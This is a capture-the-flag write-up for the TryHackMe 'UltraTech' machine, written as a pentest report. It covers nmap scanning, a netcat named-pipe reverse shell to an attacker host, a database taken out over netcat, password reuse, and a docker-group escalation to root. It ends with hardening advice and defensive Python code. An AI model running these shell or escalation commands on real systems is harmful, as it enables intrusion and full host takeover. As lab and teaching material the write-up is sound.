“UltraTech” is a boot2root machine on TryHackMe rated intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box assessment: the only information you have is the company’s name and their server’s IP address.


First of all, an Nmap scan of all ports on the target machine was run, followed by a script and version scan of the open ports.

sudo nmap -p- -oN nmap/all -vv <target ip>
sudo nmap -p21,22,8081,31331 -sC -sV -O -oN nmap/scripts -vv <target ip>

[Screenshot: pinging the attacker machine]
[Screenshot: receiving the ping]

Initial Access

The following bash script was created and served by the attacker via HTTP. It is a named-pipe reverse shell that connects back to the attacker on port 443.

# Named-pipe reverse shell: input read from the pipe is fed to sh, output goes back over netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker ip> 443 >/tmp/f

[Screenshot: SQLite database file]
[Screenshot: exfiltration via netcat]

Privilege Escalation to r00t

“r00t” is also a user on the box. Privilege escalation to “r00t” was possible because of password reuse.

Privilege Escalation

The privilege escalation to root could be accomplished by abusing the docker command, since r00t is a member of the docker group.

# Mounts the host's /root directory into the container at /mnt
docker run -v /root:/mnt -it bash


The filter on the API should be hardened. Furthermore, functionality that is not ready for use should not be deployed on a live machine. Passwords should not be hashed with the MD5 hash function; an appropriate password hashing function should be used instead, e.g. PBKDF2. The password policy should prohibit the use of common passwords, and the reuse of passwords should also be prohibited. Users of the organization should be encouraged to follow the password policy. Also keep in mind that adding a user to the docker group gives them root rights on the host. The user r00t should not be in the docker group if it is not needed.
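As an added illustration of the first and third recommendations (not code from the original write-up or from UltraTech), the following Python shows a ping-target check that only accepts an IP address or a plain hostname and never hands input to a shell, beside PBKDF2 password hashing with a random salt and constant-time verification. Function names and the iteration count are assumptions for this example.

```python
import base64
import hashlib
import hmac
import ipaddress
import os
import re

# Hostname: dot-separated labels of letters, digits and hyphens, no leading/trailing hyphen.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to the server's CPU budget


def is_safe_ping_target(value: str) -> bool:
    """Allow-list check: True only for an IP address or a plain hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(value))


def build_ping_command(target: str) -> list:
    """Return the argv list for ping; raise on anything that is not a host.

    Passing a list to subprocess.run (never shell=True) means characters such as
    ';', '|' or '`' are never interpreted, even if the regex were too permissive.
    """
    if not is_safe_ping_target(target):
        raise ValueError("invalid ping target")
    return ["ping", "-c", "1", target]


def hash_password(password: str) -> str:
    """PBKDF2-HMAC-SHA256 with a fresh 16-byte salt, stored as algo$iter$salt$hash."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        PBKDF2_ITERATIONS, base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def verify_password(stored: str, password: str) -> bool:
    """Recompute the hash from the stored salt and compare in constant time."""
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))
```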
